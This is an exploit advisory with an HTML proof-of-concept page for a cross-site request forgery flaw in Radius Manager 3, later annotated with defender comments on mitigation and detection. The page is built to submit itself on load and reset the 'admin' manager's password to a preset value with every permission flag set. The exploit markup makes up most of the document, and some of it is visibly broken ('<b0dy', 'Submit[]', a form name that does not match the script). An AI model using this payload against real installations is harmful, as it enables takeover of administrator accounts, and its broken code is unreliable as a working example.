< ------------------- header data start ------------------- >

#############################################################

# Application Name : Radius Manager 3 # XSRF

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Impact (Infection) : The admin password can be changed remotely and automatically; as with any XSRF, the request rides on an administrator's authenticated session.

# Bug Fix Advice : A session key (session token) should be added to the form, and the old password should be asked for before it is changed.

# author : Bug Researchers/DaiMon

# Script Price : $99,00!
############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >



<!--
  Proof-of-concept page for the XSRF issue described in the advisory header.
  It is written to post a manager-update form as soon as the page loads,
  with no action from the visitor.

  What the markup shows, from a defender's point of view:
    * the request is a POST to admin.php with cont=update_manager and
      managername=admin in the query string;
    * the form contains no hidden per-session token field and no field for
      the current password, so nothing in the request itself ties it to a
      form the application served;
    * the new password and its confirmation are supplied by the page.

  Mitigation named in the advisory: add a session token to the form and ask
  for the old password. Complementary controls commonly used for this class
  of bug: SameSite cookies for the admin session and server-side validation
  of the Origin / Referer header on state-changing requests.

  NOTE(review): for detection, POSTs to the update_manager action whose
  Origin / Referer is not the application's own host are worth alerting on;
  confirm that the web server logs those headers.
-->
<b0dy onLoad=Submit();>
<script>function Submit[]{document.DaiMon.submit();}</script>

<!-- State-changing request aimed at the "admin" manager account (see the managername parameter). -->
<form name=form1 action=admin.php?cont=update_manager&managername=admin method=post>
<td colspan=5 class=normal><strong>admin</strong></td>
<td colspan=5 class=normal><input name=enablemanager type=checkbox id=enablemanager value=1 checked>
<!-- New password and its confirmation are preset to the same value; the form has no current-password field. -->
<td colspan=5 class=normal><input name=password1 type=password class=normal id=password1 value=DaiMon maxlength=32 size=18>
<td colspan=5 class=normal><input name=password2 type=password class=normal id=password2 value=DaiMon maxlength=32 size=18>
<!-- Every perm_* checkbox below is pre-checked with value=1, so the submitted request carries each permission flag listed here. -->
<input name=perm_listusers type=checkbox id=perm_listusers value=1 checked></td>
<input name=perm_listmanagers type=checkbox id=perm_listmanagers value=1 checked>
<input name=perm_listservices type=checkbox id=perm_listservices value=1 checked>
<input name=perm_createusers type=checkbox id=perm_createusers value=1 checked>
<input name=perm_createmanagers type=checkbox id=perm_createmanagers value=1 checked>
<input name=perm_createservices type=checkbox id=perm_createservices value=1 checked>
<input name=perm_editusers type=checkbox id=perm_editusers value=1 checked>
<input name=perm_editmanagers type=checkbox id=perm_editmanagers value=1 checked>
<input name=perm_editservices type=checkbox id=perm_editservices value=1 checked>
<input name=perm_deleteusers type=checkbox id=perm_deleteusers value=1 checked>
<input name=perm_deletemanagers type=checkbox id=perm_deletemanagers value=1 checked>
<input name=perm_deleteservices type=checkbox id=perm_deleteservices value=1 checked>
<input name=perm_listinvoices type=checkbox id=perm_listinvoices value=1 checked>
<input name=perm_listonlineusers type=checkbox id=perm_listonlineusers value=1 checked>
<input name=perm_listallinvoices type=checkbox id=perm_listallinvoices value=1 checked>
<input name=perm_logout type=checkbox id=perm_logout value=1 checked>
<input name=perm_editinvoice type=checkbox id=perm_editinvoice value=1 checked>
<input name=perm_addcredits type=checkbox id=perm_addcredits value=1 checked>
<input name=perm_listpayouts type=checkbox id=perm_listpayouts value=1 checked>
<input name=perm_trafficreport type=checkbox id=perm_trafficreport value=1 checked>
<input name=perm_makepayouts type=checkbox id=perm_makepayouts value=1 checked>
<input name=perm_cardsys type=checkbox id=perm_cardsys value=1 checked>
<input type=submit name=Submit value=update manager>


< -- bug code end of -- >